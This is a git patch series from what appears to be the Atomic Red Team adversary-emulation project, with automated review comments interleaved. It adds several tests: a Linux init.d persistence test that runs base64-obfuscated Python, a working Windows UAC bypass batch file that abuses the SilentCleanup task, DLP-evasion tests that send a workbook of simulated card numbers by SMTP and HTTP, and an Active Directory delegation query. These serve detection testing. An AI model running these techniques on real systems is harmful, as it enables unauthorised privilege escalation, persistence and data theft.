From 557bd84925f3f2914fd5b6c6608abcbc82b9549e Mon Sep 17 00:00:00 2001 From: madhavbhatt Date: Tue, 1 Jun 2021 19:56:20 -0700 Subject: [PATCH 1/9] Atomic Tests for T1543.002 : Ubuntu, CentOS, Kali --- atomics/T1543.002/T1543.002.md | 65 ++++++++++++++++++++++++++++++++++ 1 file changed, 65 insertions(+) diff --git a/atomics/T1543.002/T1543.002.md b/atomics/T1543.002/T1543.002.md index c9bfec54..6f2f4e4b 100644 --- a/atomics/T1543.002/T1543.002.md +++ b/atomics/T1543.002/T1543.002.md @@ -16,6 +16,8 @@ While adversaries typically require root privileges to create/modify service uni - [Atomic Test #1 - Create Systemd Service](#atomic-test-1---create-systemd-service) +- [Atomic Test #2 - Create Systemd Service unit file, Enable the service , Modify and Reload the service.](#atomic-test-2---create-systemd-service-unit-file--enable-the-service--modify-and-reload-the-service) +
@@ -75,4 +77,67 @@ systemctl daemon-reload +
+
+ +## Atomic Test #2 - Create Systemd Service unit file, Enable the service , Modify and Reload the service. +This test creates a systemd service unit file and enables it to autostart on boot. Once service is created and enabled, it also modifies this same service file showcasing both Creation and Modification of system process. + +**Supported Platforms:** Linux + + + + + +#### Attack Commands: Run with `bash`! Elevation Required (e.g. root or admin) + + +```bash +cat > /etc/init.d/T1543.002 << EOF +#!/bin/bash +### BEGIN INIT INFO +# Provides : Atomic Test T1543.002 +# Required-Start: $all +# Required-Stop : +# Default-Start: 2 3 4 5 +# Default-Stop: +# Short Description: Atomic Test for Systemd Service Creation +### END INIT INFO +python3 -c "import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBDcmVhdGluZyBTeXN0ZW1kIFNlcnZpY2UgVDE1NDMuMDAyID4gL3RtcC9UMTU0My4wMDIuc3lzdGVtZC5zZXJ2aWNlLmNyZWF0aW9uJykK'))" +EOF + +chmod +x /etc/init.d/T1543.002 +if [ $(cat /etc/os-release | grep -i ID=ubuntu) ] || [ $(cat /etc/os-release | grep -i ID=kali) ]; then update-rc.d T1543.002 defaults; elif [ $(cat /etc/os-release | grep -i 'ID="centos"') ]; then chkconfig T1543.002 on ; else echo "Please run this test on Ubnutu , kali OR centos" ; fi ; +systemctl enable T1543.002 +systemctl start T1543.002 + +echo "python3 -c \"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgYSBTeXN0ZW1kIFNlcnZpY2UgVDE1NDMuMDAyID4gL3RtcC9UMTU0My4wMDIuc3lzdGVtZC5zZXJ2aWNlLm1vZGlmaWNhdGlvbicpCg=='))\"" | sudo tee -a /etc/init.d/T1543.002 +systemctl daemon-reload +systemctl restart T1543.002 +``` + +#### Cleanup Commands: +```bash +systemctl stop T1543.002 +systemctl disable T1543.002 +rm -rf /etc/init.d/T1543.002 +systemctl daemon-reload +``` + + + +#### Dependencies: Run with `bash`! +##### Description: System must be Ubuntu ,Kali OR CentOS. 
+##### Check Prereq Commands: +```bash +if [ $(cat /etc/os-release | grep -i ID=ubuntu) ] || [ $(cat /etc/os-release | grep -i ID=kali) ] || [ $(cat /etc/os-release | grep -i 'ID="centos"') ]; then exit /b 0; else exit /b 1; fi; +``` +##### Get Prereq Commands: +```bash +echo Please run these atomic tests from Ubuntu ,Kali OR CentOS. +``` + + + +
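Review bot: The check in the `Check Prereq Commands` block ends each branch with `exit /b 0` / `exit /b 1`, which is cmd.exe syntax; under `bash`, `exit` rejects the non-numeric argument `/b` ("numeric argument required") and the check always exits non-zero, so the dependency can never be satisfied and the test never runs. Change the two branches to `exit 0` and `exit 1`. The OS detection repeated in both blocks, `[ $(cat /etc/os-release | grep -i ID=ubuntu) ]`, word-splits an unquoted substitution; `grep -qi '^ID=ubuntu' /etc/os-release` (and likewise for kali and centos) is both safer and shorter. The unquoted heredoc `cat > /etc/init.d/T1543.002 << EOF` also expands `$all` in `# Required-Start: $all` to an empty string before the unit script is written, so the LSB header loses its dependency line; quoting the delimiter as `<< 'EOF'` keeps it literal. Judging by the later "Generate docs" commits in this series, this markdown is regenerated from `T1543.002.yaml`, so the test should be added to the yaml as well or the next generator run will drop it.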
From 980c7e8bd56019b4a11b37e67231c81ee50d596a Mon Sep 17 00:00:00 2001 From: tlor89 <60741301+tlor89@users.noreply.github.com> Date: Wed, 2 Jun 2021 21:48:22 -0500 Subject: [PATCH 2/9] T1548.002-Update (#1492) * T1548.002-Update * formatting Co-authored-by: Toua Lor Co-authored-by: Carrie Roberts --- atomics/T1548.002/T1548.002.yaml | 25 +++++++++++++++++++++++++ atomics/T1548.002/src/T1548.002.bat | 8 ++++++++ 2 files changed, 33 insertions(+) create mode 100644 atomics/T1548.002/src/T1548.002.bat diff --git a/atomics/T1548.002/T1548.002.yaml b/atomics/T1548.002/T1548.002.yaml index 5186a236..17eb59f5 100644 --- a/atomics/T1548.002/T1548.002.yaml +++ b/atomics/T1548.002/T1548.002.yaml @@ -162,3 +162,28 @@ atomic_tests: reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 1 /f name: command_prompt elevation_required: true +- name: Bypass UAC using SilentCleanup task + description: | + Bypass UAC using SilentCleanup task on Windows 8-10 using bat file from https://www.reddit.com/r/hacking/comments/ajtrws/bypassing_highest_uac_level_windows_810/ + + There is an auto-elevated task called SilentCleanup located in %windir%\system32\cleanmgr.exe This can be abused to elevate any file with Administrator privileges without prompting UAC (even highest level). + + For example, we can set the windir registry kye to: "cmd /k REM " + + And forcefully run SilentCleanup task: + + schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I + + REM will tell it to ignore everything after %windir% and treat it just as a NOTE. Therefore just executing cmd with admin privs. + supported_platforms: + - windows + input_arguments: + file_path: + description: Path to the bat file + type: String + default: PathToAtomicsFolder\T1548.002\src\T1548.002.bat + executor: + command: | + #{file_path} + name: command_prompt + elevation_required: false 
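Review bot: The new test has no `cleanup_command`, yet the bat file it runs writes `HKCU\Environment\windir` and only removes it on its own last line; if the executor is interrupted between the `reg add` and the `reg delete`, the per-user `windir` override stays behind and keeps affecting anything that reads that variable. Add `cleanup_command: reg delete "HKCU\Environment" /v "windir" /F` under `executor` so the harness can always restore the environment. The description also disagrees with the bat file: it says the value set is `"cmd /k REM "`, while `T1548.002.bat` writes `"cmd /c start powershell&REM "`, and "registry kye" is a typo for "registry key". For consistency with the other tests in this series (e.g. `input_file` in T1027.yaml), `file_path` should probably be `type: path` rather than `type: String`.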
diff --git a/atomics/T1548.002/src/T1548.002.bat b/atomics/T1548.002/src/T1548.002.bat new file mode 100644 index 00000000..d873b527 --- /dev/null +++ b/atomics/T1548.002/src/T1548.002.bat @@ -0,0 +1,8 @@ +@echo off +mode 18,1 +color FE +reg add "HKCU\Environment" /v "windir" /d "cmd /c start powershell&REM " >nul +timeout /t 2 >nul +schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I >nul +timeout /t 3 >nul +reg delete "HKCU\Environment" /v "windir" /F \ No newline at end of file From 3726625d5809ae768d509383753c58418103674d Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team GUID generator Date: Thu, 3 Jun 2021 02:48:38 +0000 Subject: [PATCH 3/9] Generate GUIDs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/T1548.002/T1548.002.yaml | 1 + atomics/used_guids.txt | 1 + 2 files changed, 2 insertions(+) diff --git a/atomics/T1548.002/T1548.002.yaml b/atomics/T1548.002/T1548.002.yaml index 17eb59f5..619b5f6a 100644 --- a/atomics/T1548.002/T1548.002.yaml +++ b/atomics/T1548.002/T1548.002.yaml @@ -163,6 +163,7 @@ atomic_tests: name: command_prompt elevation_required: true - name: Bypass UAC using SilentCleanup task + auto_generated_guid: 28104f8a-4ff1-4582-bcf6-699dce156608 description: | Bypass UAC using SilentCleanup task on Windows 8-10 using bat file from https://www.reddit.com/r/hacking/comments/ajtrws/bypassing_highest_uac_level_windows_810/ diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt index 7d1c8c5d..361e31fb 100644 --- a/atomics/used_guids.txt +++ b/atomics/used_guids.txt @@ -704,3 +704,4 @@ e2d85e66-cb66-4ed7-93b1-833fc56c9319 788e0019-a483-45da-bcfe-96353d46820f 58004e22-022c-4c51-b4a8-2b85ac5c596b 0b2f9520-a17a-4671-9dba-3bd034099fff +28104f8a-4ff1-4582-bcf6-699dce156608 From 7549cc7d616fc60542f2aedefe1ed2db0b336f7b Mon Sep 17 00:00:00 2001 
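Review bot: Every command in the new `T1548.002.bat` except the final `reg delete` has its output discarded with `>nul`, and cmd does not stop on error, so a failed `reg add` or `schtasks /run` is silently skipped and the script's exit status is simply that of the closing `reg delete`; the harness therefore reports success whether or not the task ever ran. Dropping the `>nul` redirections, or appending `|| exit /b 1` to the `reg add` and `schtasks` lines, would make a failure visible in the executor's exit code. The file is also committed without a trailing newline.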
From: CircleCI Atomic Red Team doc generator Date: Thu, 3 Jun 2021 02:48:44 +0000 Subject: [PATCH 4/9] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/Indexes-CSV/index.csv | 2 + atomics/Indexes/Indexes-CSV/windows-index.csv | 2 + atomics/Indexes/Indexes-Markdown/index.md | 2 + .../Indexes/Indexes-Markdown/windows-index.md | 2 + atomics/Indexes/index.yaml | 50 +++++++++++++++++++ atomics/T1548.002/T1548.002.md | 41 +++++++++++++++ 6 files changed, 99 insertions(+) diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index e84bab59..8f816a2c 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv @@ -118,6 +118,7 @@ privilege-escalation,T1548.002,Bypass User Account Control,5,Bypass UAC using Co privilege-escalation,T1548.002,Bypass User Account Control,6,Bypass UAC by Mocking Trusted Directories,f7a35090-6f7f-4f64-bb47-d657bf5b10c1,command_prompt privilege-escalation,T1548.002,Bypass User Account Control,7,Bypass UAC using sdclt DelegateExecute,3be891eb-4608-4173-87e8-78b494c029b7,powershell privilege-escalation,T1548.002,Bypass User Account Control,8,Disable UAC using reg.exe,9e8af564-53ec-407e-aaa8-3cb20c3af7f9,command_prompt +privilege-escalation,T1548.002,Bypass User Account Control,9,Bypass UAC using SilentCleanup task,28104f8a-4ff1-4582-bcf6-699dce156608,command_prompt privilege-escalation,T1574.012,COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell privilege-escalation,T1574.012,COR_PROFILER,2,System Scope COR_PROFILER,f373b482-48c8-4ce4-85ed-d40c8b3f7310,powershell privilege-escalation,T1574.012,COR_PROFILER,3,Registry-free process scope COR_PROFILER,79d57242-bbef-41db-b301-9d01d9f6e817,powershell 
@@ -215,6 +216,7 @@ defense-evasion,T1548.002,Bypass User Account Control,5,Bypass UAC using Compute defense-evasion,T1548.002,Bypass User Account Control,6,Bypass UAC by Mocking Trusted Directories,f7a35090-6f7f-4f64-bb47-d657bf5b10c1,command_prompt defense-evasion,T1548.002,Bypass User Account Control,7,Bypass UAC using sdclt DelegateExecute,3be891eb-4608-4173-87e8-78b494c029b7,powershell defense-evasion,T1548.002,Bypass User Account Control,8,Disable UAC using reg.exe,9e8af564-53ec-407e-aaa8-3cb20c3af7f9,command_prompt +defense-evasion,T1548.002,Bypass User Account Control,9,Bypass UAC using SilentCleanup task,28104f8a-4ff1-4582-bcf6-699dce156608,command_prompt defense-evasion,T1218.003,CMSTP,1,CMSTP Executing Remote Scriptlet,34e63321-9683-496b-bbc1-7566bc55e624,command_prompt defense-evasion,T1218.003,CMSTP,2,CMSTP Executing UAC Bypass,748cb4f6-2fb3-4e97-b7ad-b22635a09ab0,command_prompt defense-evasion,T1574.012,COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv index e3a45879..703da0de 100644 --- a/atomics/Indexes/Indexes-CSV/windows-index.csv +++ b/atomics/Indexes/Indexes-CSV/windows-index.csv 
@@ -85,6 +85,7 @@ privilege-escalation,T1548.002,Bypass User Account Control,5,Bypass UAC using Co privilege-escalation,T1548.002,Bypass User Account Control,6,Bypass UAC by Mocking Trusted Directories,f7a35090-6f7f-4f64-bb47-d657bf5b10c1,command_prompt privilege-escalation,T1548.002,Bypass User Account Control,7,Bypass UAC using sdclt DelegateExecute,3be891eb-4608-4173-87e8-78b494c029b7,powershell privilege-escalation,T1548.002,Bypass User Account Control,8,Disable UAC using reg.exe,9e8af564-53ec-407e-aaa8-3cb20c3af7f9,command_prompt +privilege-escalation,T1548.002,Bypass User Account Control,9,Bypass UAC using SilentCleanup task,28104f8a-4ff1-4582-bcf6-699dce156608,command_prompt privilege-escalation,T1574.012,COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell privilege-escalation,T1574.012,COR_PROFILER,2,System Scope COR_PROFILER,f373b482-48c8-4ce4-85ed-d40c8b3f7310,powershell privilege-escalation,T1574.012,COR_PROFILER,3,Registry-free process scope COR_PROFILER,79d57242-bbef-41db-b301-9d01d9f6e817,powershell 
@@ -151,6 +152,7 @@ defense-evasion,T1548.002,Bypass User Account Control,5,Bypass UAC using Compute defense-evasion,T1548.002,Bypass User Account Control,6,Bypass UAC by Mocking Trusted Directories,f7a35090-6f7f-4f64-bb47-d657bf5b10c1,command_prompt defense-evasion,T1548.002,Bypass User Account Control,7,Bypass UAC using sdclt DelegateExecute,3be891eb-4608-4173-87e8-78b494c029b7,powershell defense-evasion,T1548.002,Bypass User Account Control,8,Disable UAC using reg.exe,9e8af564-53ec-407e-aaa8-3cb20c3af7f9,command_prompt +defense-evasion,T1548.002,Bypass User Account Control,9,Bypass UAC using SilentCleanup task,28104f8a-4ff1-4582-bcf6-699dce156608,command_prompt defense-evasion,T1218.003,CMSTP,1,CMSTP Executing Remote Scriptlet,34e63321-9683-496b-bbc1-7566bc55e624,command_prompt defense-evasion,T1218.003,CMSTP,2,CMSTP Executing UAC Bypass,748cb4f6-2fb3-4e97-b7ad-b22635a09ab0,command_prompt defense-evasion,T1574.012,COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index 3a916e39..d1a78b05 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md @@ -227,6 +227,7 @@ - Atomic Test #6: Bypass UAC by Mocking Trusted Directories [windows] - Atomic Test #7: Bypass UAC using sdclt DelegateExecute [windows] - Atomic Test #8: Disable UAC using reg.exe [windows] + - Atomic Test #9: Bypass UAC using SilentCleanup task [windows] - [T1574.012 COR_PROFILER](../../T1574.012/T1574.012.md) - Atomic Test #1: User scope COR_PROFILER [windows] - Atomic Test #2: System Scope COR_PROFILER [windows] 
@@ -417,6 +418,7 @@ - Atomic Test #6: Bypass UAC by Mocking Trusted Directories [windows] - Atomic Test #7: Bypass UAC using sdclt DelegateExecute [windows] - Atomic Test #8: Disable UAC using reg.exe [windows] + - Atomic Test #9: Bypass UAC using SilentCleanup task [windows] - [T1218.003 CMSTP](../../T1218.003/T1218.003.md) - Atomic Test #1: CMSTP Executing Remote Scriptlet [windows] - Atomic Test #2: CMSTP Executing UAC Bypass [windows] diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md index 6433b60d..d1f5864e 100644 --- a/atomics/Indexes/Indexes-Markdown/windows-index.md +++ b/atomics/Indexes/Indexes-Markdown/windows-index.md @@ -178,6 +178,7 @@ - Atomic Test #6: Bypass UAC by Mocking Trusted Directories [windows] - Atomic Test #7: Bypass UAC using sdclt DelegateExecute [windows] - Atomic Test #8: Disable UAC using reg.exe [windows] + - Atomic Test #9: Bypass UAC using SilentCleanup task [windows] - [T1574.012 COR_PROFILER](../../T1574.012/T1574.012.md) - Atomic Test #1: User scope COR_PROFILER [windows] - Atomic Test #2: System Scope COR_PROFILER [windows] @@ -308,6 +309,7 @@ - Atomic Test #6: Bypass UAC by Mocking Trusted Directories [windows] - Atomic Test #7: Bypass UAC using sdclt DelegateExecute [windows] - Atomic Test #8: Disable UAC using reg.exe [windows] + - Atomic Test #9: Bypass UAC using SilentCleanup task [windows] - [T1218.003 CMSTP](../../T1218.003/T1218.003.md) - Atomic Test #1: CMSTP Executing Remote Scriptlet [windows] - Atomic Test #2: CMSTP Executing UAC Bypass [windows] diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index af7d14dd..375f275d 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml 
@@ -10120,6 +10120,31 @@ privilege-escalation: ' name: command_prompt elevation_required: true + - name: Bypass UAC using SilentCleanup task + auto_generated_guid: 28104f8a-4ff1-4582-bcf6-699dce156608 + description: | + Bypass UAC using SilentCleanup task on Windows 8-10 using bat file from https://www.reddit.com/r/hacking/comments/ajtrws/bypassing_highest_uac_level_windows_810/ + + There is an auto-elevated task called SilentCleanup located in %windir%\system32\cleanmgr.exe This can be abused to elevate any file with Administrator privileges without prompting UAC (even highest level). + + For example, we can set the windir registry kye to: "cmd /k REM " + + And forcefully run SilentCleanup task: + + schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I + + REM will tell it to ignore everything after %windir% and treat it just as a NOTE. Therefore just executing cmd with admin privs. + supported_platforms: + - windows + input_arguments: + file_path: + description: Path to the bat file + type: String + default: PathToAtomicsFolder\T1548.002\src\T1548.002.bat + executor: + command: "#{file_path}\n" + name: command_prompt + elevation_required: false T1574.012: technique: external_references: 
@@ -19315,6 +19340,31 @@ defense-evasion: ' name: command_prompt elevation_required: true + - name: Bypass UAC using SilentCleanup task + auto_generated_guid: 28104f8a-4ff1-4582-bcf6-699dce156608 + description: | + Bypass UAC using SilentCleanup task on Windows 8-10 using bat file from https://www.reddit.com/r/hacking/comments/ajtrws/bypassing_highest_uac_level_windows_810/ + + There is an auto-elevated task called SilentCleanup located in %windir%\system32\cleanmgr.exe This can be abused to elevate any file with Administrator privileges without prompting UAC (even highest level). + + For example, we can set the windir registry kye to: "cmd /k REM " + + And forcefully run SilentCleanup task: + + schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I + + REM will tell it to ignore everything after %windir% and treat it just as a NOTE. Therefore just executing cmd with admin privs. + supported_platforms: + - windows + input_arguments: + file_path: + description: Path to the bat file + type: String + default: PathToAtomicsFolder\T1548.002\src\T1548.002.bat + executor: + command: "#{file_path}\n" + name: command_prompt + elevation_required: false T1218.003: technique: external_references: diff --git a/atomics/T1548.002/T1548.002.md b/atomics/T1548.002/T1548.002.md index 98064122..597dc756 100644 --- a/atomics/T1548.002/T1548.002.md +++ b/atomics/T1548.002/T1548.002.md @@ -28,6 +28,8 @@ Another bypass is possible through some lateral movement techniques if credentia - [Atomic Test #8 - Disable UAC using reg.exe](#atomic-test-8---disable-uac-using-regexe) +- [Atomic Test #9 - Bypass UAC using SilentCleanup task](#atomic-test-9---bypass-uac-using-silentcleanup-task) +
@@ -314,4 +316,43 @@ reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v En +
+
+ +## Atomic Test #9 - Bypass UAC using SilentCleanup task +Bypass UAC using SilentCleanup task on Windows 8-10 using bat file from https://www.reddit.com/r/hacking/comments/ajtrws/bypassing_highest_uac_level_windows_810/ + +There is an auto-elevated task called SilentCleanup located in %windir%\system32\cleanmgr.exe This can be abused to elevate any file with Administrator privileges without prompting UAC (even highest level). + +For example, we can set the windir registry kye to: "cmd /k REM " + +And forcefully run SilentCleanup task: + +schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I + +REM will tell it to ignore everything after %windir% and treat it just as a NOTE. Therefore just executing cmd with admin privs. + +**Supported Platforms:** Windows + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| file_path | Path to the bat file | String | PathToAtomicsFolder\T1548.002\src\T1548.002.bat| + + +#### Attack Commands: Run with `command_prompt`! + + +```cmd +#{file_path} +``` + + + + + +
From 1540de2d2135095a0766f2123aaffbe3d2fdf881 Mon Sep 17 00:00:00 2001 From: Carrie Roberts Date: Thu, 3 Jun 2021 07:46:26 -0600 Subject: [PATCH 5/9] corrections as per BoBoSiKi008 (#1494) see Issue #1490 --- atomics/T1027/T1027.yaml | 8 +++----- 1 file changed, 3 insertions(+), 5 deletions(-) diff --git a/atomics/T1027/T1027.yaml b/atomics/T1027/T1027.yaml index 4288d3ae..7210e5af 100644 --- a/atomics/T1027/T1027.yaml +++ b/atomics/T1027/T1027.yaml @@ -109,7 +109,7 @@ atomic_tests: supported_platforms: - windows input_arguments: - input_file: + input_file: description: Path of the XLSM file type: path default: PathToAtomicsFolder\T1027\src\T1027-cc-macro.xlsm @@ -125,10 +125,9 @@ atomic_tests: description: SMTP Server IP Address type: string default: 127.0.0.1 - dependency_executor_name: powershell executor: command: | - "Send-MailMessage -From #{sender} -To #{receiver} -Subject "T1027 Atomic Test" -Attachments PathToAtomicsFolder\T1027\src\T1027-cc-macro.xlsm -SmtpServer #{smtp_server}" + Send-MailMessage -From #{sender} -To #{receiver} -Subject 'T1027_Atomic_Test' -Attachments #{input_file} -SmtpServer #{smtp_server} name: powershell - name: DLP Evasion via Sensitive Data in VBA Macro over HTTP @@ -147,8 +146,7 @@ atomic_tests: description: Destination IP address type: string default: 127.0.0.1 - dependency_executor_name: powershell executor: command: | - Invoke-WebRequest -Uri #{ip_address} -Method POST -Body PathToAtomicsFolder\T1027\src\T1027-cc-macro.xlsm + Invoke-WebRequest -Uri #{ip_address} -Method POST -Body #{input_file} name: powershell From 9a3528e02721eb8b937b540559dfa6f8e2f884b8 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Thu, 3 Jun 2021 13:47:03 +0000 Subject: [PATCH 6/9] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/index.yaml | 9 +++------ atomics/T1027/T1027.md | 4 ++-- 2 files changed, 5 insertions(+), 8 deletions(-) 
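Review bot: `-Attachments #{input_file}` on the corrected Send-MailMessage line is unquoted; the default resolves through `PathToAtomicsFolder`, so an install path containing a space splits the argument and the cmdlet fails with a parameter-binding error instead of attaching the file. Quote it as `-Attachments "#{input_file}"`. The same applies to `-Body #{input_file}` in the Invoke-WebRequest hunk that follows.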
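Review bot: `Invoke-WebRequest -Uri #{ip_address} -Method POST -Body #{input_file}` sends the path string itself as the request body, not the contents of the XLSM file, so the HTTP test only posts a file name while its description frames it as moving the macro's simulated sensitive data. If transmitting the file is intended, `-InFile "#{input_file}"` is the parameter that reads the body from a file; if only triggering a POST to the address is intended, the description should say so. `dependency_executor_name` was removed here and in the mail test; that is only correct if the test has no `dependencies:` block, which lies outside the hunk.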
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 375f275d..7db65eb5 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -28937,11 +28937,9 @@ defense-evasion: description: SMTP Server IP Address type: string default: 127.0.0.1 - dependency_executor_name: powershell executor: - command: '"Send-MailMessage -From #{sender} -To #{receiver} -Subject "T1027 - Atomic Test" -Attachments PathToAtomicsFolder\T1027\src\T1027-cc-macro.xlsm - -SmtpServer #{smtp_server}" + command: 'Send-MailMessage -From #{sender} -To #{receiver} -Subject ''T1027_Atomic_Test'' + -Attachments #{input_file} -SmtpServer #{smtp_server} ' name: powershell @@ -28961,9 +28959,8 @@ defense-evasion: description: Destination IP address type: string default: 127.0.0.1 - dependency_executor_name: powershell executor: - command: 'Invoke-WebRequest -Uri #{ip_address} -Method POST -Body PathToAtomicsFolder\T1027\src\T1027-cc-macro.xlsm + command: 'Invoke-WebRequest -Uri #{ip_address} -Method POST -Body #{input_file} ' name: powershell diff --git a/atomics/T1027/T1027.md b/atomics/T1027/T1027.md index 74a09cdb..9f34ff74 100644 --- a/atomics/T1027/T1027.md +++ b/atomics/T1027/T1027.md @@ -203,7 +203,7 @@ Sensitive data includes about around 20 odd simulated credit card numbers that p ```powershell -"Send-MailMessage -From #{sender} -To #{receiver} -Subject "T1027 Atomic Test" -Attachments PathToAtomicsFolder\T1027\src\T1027-cc-macro.xlsm -SmtpServer #{smtp_server}" +Send-MailMessage -From #{sender} -To #{receiver} -Subject 'T1027_Atomic_Test' -Attachments #{input_file} -SmtpServer #{smtp_server} ``` @@ -234,7 +234,7 @@ Sensitive data includes about around 20 odd simulated credit card numbers that p ```powershell -Invoke-WebRequest -Uri #{ip_address} -Method POST -Body PathToAtomicsFolder\T1027\src\T1027-cc-macro.xlsm +Invoke-WebRequest -Uri #{ip_address} -Method POST -Body #{input_file} ``` From 9b357633812ff2efdd473075aac619e00ffbf6df Mon Sep 17 00:00:00 2001 
From: Alex Flores Date: Fri, 4 Jun 2021 12:51:02 -0400 Subject: [PATCH 7/9] adds test for enumerating unconstrained delegation (#1495) * adds test for enumerating unconstrained delegation * small update to wording on dependency Co-authored-by: Carrie Roberts --- atomics/T1087.002/T1087.002.yaml | 48 +++++++++++++++++++++++++++++--- 1 file changed, 44 insertions(+), 4 deletions(-) diff --git a/atomics/T1087.002/T1087.002.yaml b/atomics/T1087.002/T1087.002.yaml index d8f3a3f4..de4e2e26 100644 --- a/atomics/T1087.002/T1087.002.yaml +++ b/atomics/T1087.002/T1087.002.yaml @@ -69,7 +69,7 @@ atomic_tests: name: powershell - name: Adfind -Listing password policy auto_generated_guid: 736b4f53-f400-4c22-855d-1a6b5a551600 - description: | + description: | Adfind tool can be used for reconnaissance in an Active directory environment. The example chosen illustrates adfind used to query the local password policy. reference- http://www.joeware.net/freetools/tools/adfind/, https://social.technet.microsoft.com/wiki/contents/articles/7535.adfind-command-examples.aspx supported_platforms: @@ -93,7 +93,7 @@ atomic_tests: name: command_prompt - name: Adfind - Enumerate Active Directory Admins auto_generated_guid: b95fd967-4e62-4109-b48d-265edfd28c3a - description: | + description: | Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory Admin accounts reference- http://www.joeware.net/freetools/tools/adfind/, https://stealthbits.com/blog/fun-with-active-directorys-admincount-attribute/ supported_platforms: 
@@ -117,7 +117,7 @@ atomic_tests: name: command_prompt - name: Adfind - Enumerate Active Directory User Objects auto_generated_guid: e1ec8d20-509a-4b9a-b820-06c9b2da8eb7 - description: | + description: | Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory User Objects reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html supported_platforms: @@ -141,7 +141,7 @@ atomic_tests: name: command_prompt - name: Adfind - Enumerate Active Directory Exchange AD Objects auto_generated_guid: 5e2938fb-f919-47b6-8b29-2f6a1f718e99 - description: | + description: | Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory Exchange Objects reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html supported_platforms: 
@@ -173,3 +173,43 @@ atomic_tests: command: | net user administrator /domain name: command_prompt + +- name: Enumerate Active Directory for Unconstrained Delegation + description: | + Attackers may attempt to query for computer objects with the UserAccountControl property + 'TRUSTED_FOR_DELEGATION' (0x80000;524288) set + More Information - https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html#when-the-stars-align-unconstrained-delegation-leads-to-rce + Prerequisite: AD RSAT PowerShell module is needed and it must run under a domain user + supported_platforms: + - windows + input_arguments: + domain: + description: Domain FQDN + type: String + default: contoso.com + uac_prop: + description: UAC Property to search + type: String + default: 524288 + dependencies: + - description: | + PowerShell ActiveDirectory Module must be installed + prereq_command: | + Try { + Import-Module ActiveDirectory -ErrorAction Stop | Out-Null + exit 0 + } + Catch { + exit 1 + } + get_prereq_command: | + if((Get-CimInstance -ClassName Win32_OperatingSystem).ProductType -eq 1) { + Add-WindowsCapability -Name (Get-WindowsCapability -Name RSAT.ActiveDirectory.DS* -Online).Name -Online + } else { + Install-WindowsFeature RSAT-AD-PowerShell + } + executor: + name: powershell + elevation_required: false + command: | + Get-ADObject -LDAPFilter '(UserAccountControl:1.2.840.113556.1.4.803:=#{uac_prop})' -Server #{domain} From 3afb4da266a1b42b55a0e8f003c441cedd482acb Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team GUID generator Date: Fri, 4 Jun 2021 16:51:20 +0000 Subject: [PATCH 8/9] Generate GUIDs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/T1087.002/T1087.002.yaml | 1 + atomics/used_guids.txt | 1 + 2 files changed, 2 insertions(+) diff --git a/atomics/T1087.002/T1087.002.yaml b/atomics/T1087.002/T1087.002.yaml index de4e2e26..61822ffb 100644 --- a/atomics/T1087.002/T1087.002.yaml +++ b/atomics/T1087.002/T1087.002.yaml 
